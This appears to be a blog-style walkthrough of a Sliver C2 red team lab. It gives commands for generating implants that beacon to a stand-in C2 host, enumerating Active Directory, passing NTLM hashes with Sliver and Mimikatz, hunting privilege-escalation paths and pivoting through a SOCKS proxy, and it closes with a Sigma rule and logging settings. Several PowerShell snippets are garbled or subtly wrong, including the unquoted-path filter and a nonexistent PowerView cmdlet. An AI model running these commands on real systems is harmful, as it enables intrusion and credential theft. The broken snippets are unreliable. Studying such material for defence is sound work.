Listen to this Post
Introduction:
Command and Control (C2) frameworks like Sliver are revolutionizing red team operations and, by extension, modern cyber attacks. This article deconstructs a real-world red team lab scenario to provide the essential commands and techniques for both offensive security testing and defensive hardening. Understanding these workflows is critical for building resilient security postures against advanced persistent threats.
Learning Objectives:
- Master the fundamental commands for Sliver C2 operations and Active Directory enumeration.
- Understand the process of lateral movement and privilege escalation in a Windows domain.
- Learn defensive configurations and detection rules to mitigate these attack vectors.
You Should Know:
1. Establishing the C2 Infrastructure with Sliver
Sliver is an open-source C2 framework used by security professionals and adversaries alike. The initial step involves setting up the server and generating implants.
Verified Commands:
Start the Sliver server sliver-server Generate a Windows executable implant generate --mtls your-c2-server.com --os windows --arch amd64 --save /tmp/ Generate a shellcode payload for in-memory execution generate --mtls your-c2-server.com --format shellcode --save /tmp/shellcode.bin List active implants implants
Step-by-step guide:
The operator first starts the Sliver server. Using the `generate` command, a tailored implant (e.g., a Windows EXE) is created, configured to beacon back to the C2 server over an mTLS listener. The `implants` command is then used to manage active sessions. Defenders should monitor for unknown processes making outbound TLS connections and employ network segmentation to limit C2 communication.
2. Initial Compromise and Foothold
Gaining initial access often involves social engineering or exploiting public-facing applications. Once executed, the implant establishes a secure channel.
Verified Commands:
In the Sliver console, interact with a session sessions -i <session_id> Get system information from the compromised host info Execute a command on the remote system execute -o "whoami /all"
Step-by-step guide:
After the user executes the payload, a session appears in the Sliver console. The operator uses `sessions -i` to interact with it. The `info` command provides critical system details, and `execute` runs commands remotely. Blue teams can detect this by auditing process creation events (e.g., Windows Event Code 4688) for child processes spawned by uncommon parent processes.
3. Active Directory Enumeration
With a foothold, attackers map the domain to identify users, groups, and computers for lateral movement.
Verified Windows Commands:
Discover the domain name net view /all Enumerate all domain users net user /domain Enumerate domain groups, especially privileged ones net group "Domain Admins" /domain List all computers joined to the domain net group "Domain Computers" /domain Find shared drives on the network net view \\target-computer
Step-by-step guide:
Using built-in Windows commands, an attacker gathers a blueprint of the Active Directory environment. `net user /domain` lists all domain accounts, which can be used for password spraying attacks. `net group “Domain Admins” /domain` identifies high-value targets. Defenders should implement strict logging and alerting on these `net` commands, especially when run from non-administrative workstations.
4. Lateral Movement via Pass-the-Hash
Using compromised credentials, attackers move laterally between systems.
Verified Commands:
In Sliver, use the pth command to Pass-the-Hash pth --user <Username> --domain <Domain> --ntlm <NTLM_hash> --pid <explorer_pid> Alternatively, use Mimikatz through Sliver's execute command execute -o "C:\tools\mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>\" exit"
Step-by-step guide:
The `pth` command in Sliver injects a compromised NTLM hash into a specific process (like Explorer), creating a new logon session with the stolen credentials. This allows the operator to access network resources as that user. To mitigate this, defenders should enforce NTLMv2 or, ideally, Kerberos authentication, and use Credential Guard on Windows 10/11 and Server 2016+.
5. Privilege Escalation to Domain Admin
The final goal is to obtain Domain Administrator privileges, often by exploiting misconfigurations.
Verified Commands:
PowerView script for finding misconfigured services
Get-NetService -SPN | Select name, startname, path
Check for unquoted service paths
Get-WmiObject -Class Win32_Service | Where-Object {$<em>.PathName -notlike "`"" -and $</em>.PathName -like " "} | Select Name, DisplayName, State, PathName
Check for vulnerable GPO settings
Get-DomainGPO -Properties DisplayName, GPCFileSysPath | ForEach-Object { if (Test-Path (Join-Path $<em>.GPCFileSysPath "Machine\Preferences\Groups\Groups.xml")) { $</em>.DisplayName } }
Step-by-step guide:
These PowerView and WMI commands help identify common privilege escalation vectors. An unquoted service path allows an attacker to place a malicious executable in a path that is run before the legitimate service binary. Modifiable GPO preferences can reveal credentials in `Groups.xml` files. Regular system hardening audits and using tools like BloodHound for defensive posture analysis are essential countermeasures.
6. Pivoting and Internal Reconnaissance
Once privileged access is gained, attackers pivot to other network segments.
Verified Sliver & System Commands:
In Sliver, set up a SOCKS proxy for pivoting socks5 1080 Perform a port scan from the compromised host through the proxy execute -o "C:\tools\nmap.exe -sS -p 445,3389,5985 10.10.20.0/24" Add a new route in Sliver for the internal network route add 10.10.20.0/24 <session_id>
Step-by-step guide:
The `socks5` command creates a proxy tunnel through the compromised host, allowing the attacker’s tools to route traffic into the internal network. The `route add` command tells Sliver to use a specific session for C2 traffic to that subnet. Network monitoring for unusual internal scanning patterns and implementing micro-segmentation can drastically limit an attacker’s ability to pivot.
7. Defensive Hardening and Detection
Understanding the attack is the first step to building a defense.
Verified SIEM & Command Logging:
Sigma rule to detect Sliver C2 traffic (YAML) title: Sliver mTLS Beacon Detection logsource: category: proxy detection: sel: c-useragent: 'Sliver/' condition: sel Windows Audit Policy to enable command line logging (via GPO) Audit: Audit process creation -> Success (Includes Command Line in Event 4688) PowerShell command to enable Module Logging Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1 Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Name "" -Value ""
Step-by-step guide:
Defenders must implement deep visibility. The provided Sigma rule detects the Sliver user agent in proxy logs. Enabling process creation auditing and PowerShell module logging captures the command lines and scripts that attackers run. These logs should be aggregated into a SIEM for correlation and alerting, creating a robust detection ecosystem.
What Undercode Say:
- The democratization of advanced C2 frameworks like Sliver has permanently lowered the barrier to entry for sophisticated attacks, making high-level tradecraft accessible to less experienced threat actors.
- Defensive strategies must evolve from pure prevention to assume-breach detection and response, focusing on robust logging, behavioral analytics, and minimizing attack paths within Active Directory.
The completion of this lab by an aspiring professional highlights a critical shift in cybersecurity education. Hands-on, offensive training is becoming mainstream, producing a new generation of defenders who think like attackers. This is a net positive for the industry. The technical walkthrough demonstrates that while the initial tools may be new, the underlying techniques—enumeration, lateral movement, privilege escalation—are timeless. The real vulnerability is often not a zero-day exploit, but a accumulation of misconfigurations and a lack of foundational security controls. Organizations that fail to implement basic hardening, credential hygiene, and network segmentation are effectively operating at a constant tactical disadvantage.
Prediction:
The proliferation of open-source C2 frameworks will lead to a surge in modular, multi-platform attacks that are harder to attribute and detect. In response, defensive AI will mature beyond signature-based detection to model normal user and network behavior, automatically flagging deviations indicative of a Sliver-like compromise. The future battleground will be in the memory space, with attackers increasingly using fileless techniques and defenders deploying advanced memory scanning and EDR solutions at the kernel level.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Mouhammad El – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
